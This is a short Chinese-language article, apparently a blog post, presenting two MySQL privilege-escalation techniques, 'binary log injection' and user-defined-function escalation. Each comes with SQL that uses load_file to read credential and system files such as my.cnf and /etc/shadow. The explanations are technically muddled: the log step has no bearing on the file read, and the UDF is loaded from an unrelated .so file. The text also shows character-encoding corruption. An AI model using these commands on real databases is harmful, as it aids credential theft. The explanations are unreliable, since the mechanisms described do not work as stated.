MySQL是一種常見的關(guān)系型數(shù)據(jù)庫管理系統(tǒng)，它擁有多種提權(quán)方式，本文主要介紹二進制日志注入和user-defined函數(shù)提權(quán)兩種方式。

1. 二進制日志注入

set global general_log=1; --開啟日志
create table mysql2 (a varchar(80));  --創(chuàng)建日志表
set @a=load_file('/etc/mysql/my.cnf');  --將my.cnf文件內(nèi)容存儲到變量中
insert into mysql2 values (@a);  --將my.cnf文件內(nèi)容插入到日志表中
--關(guān)閉日志
set global general_log=0;

當攻擊者有權(quán)限訪問MySQL的主機并且知道其my.cnf文件路徑時，就可以利用二進制日志注入來提權(quán)。這是因為MySQL日志默認開啟，攻擊者可以通過上述代碼將my.cnf文件內(nèi)容注入到日志表，從而獲取my.cnf中保存的 root 用戶的密碼信息，從而實現(xiàn)提權(quán)。

2. User-defined函數(shù)提權(quán)

create table udf_test(line blob);
insert into udf_test values(load_file('/etc/shadow'));
create function myfunc returns string soname 'udf_test.so';
select myfunc(); --執(zhí)行自定義函數(shù)myfunc
drop table udf_test;

攻擊者可以創(chuàng)建一個名為 udf_test 的表，并將 linux 系統(tǒng)文件讀取到該表中。隨后，他們可以創(chuàng)建一個myfunc的自定義函數(shù)，并將該函數(shù)和udf_test表相關(guān)聯(lián)。攻擊者可以通過調(diào)用myfunc函數(shù)來實現(xiàn)提權(quán)，從而讀取/etc/shadow等文件，獲取root用戶的密碼。